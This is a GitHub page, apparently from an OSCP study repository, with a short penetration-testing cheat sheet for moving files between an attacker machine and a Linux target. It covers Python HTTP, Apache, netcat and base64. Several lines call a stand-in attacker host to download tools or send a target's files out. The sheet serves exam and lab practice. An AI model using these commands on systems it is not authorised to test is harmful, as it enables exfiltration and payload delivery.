forked from areyou1or0/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathFile Transfers - Linux
More file actions
58 lines (34 loc) · 877 Bytes
/
File Transfers - Linux
File metadata and controls
58 lines (34 loc) · 877 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
Python SimpleHTTPServer
#on Attacker
python -m SimpleHTTPServer
#on target
wget <attackerip>:8000/filename
------------------------------
Apache
#on Attacker
cp filetosend.txt /var/www/html
service apache2 start
#on target
wget http://attackerip/file
curl http://attackerip/file > file
fetch http://attackerip/file # on BSD
----------------------------------
Netcat (From Target to Kali)
# Listen on Kali
nc -lvp 4444 > file
# Send from Target machine
nc <kali_ip> 4444 < file
-----------------
Netcat (From Kali to Target)
# on target, wait for the file
nc -nvlp 55555 > file
# on kali, push the file
nc $victimip 55555 < file
----------------------
Extra:
To send the executable file to your machine:
base64 executable
# copy the output
# paste it in a file called file.txt
# decode it and create the executable
base64 -d file.txt > executable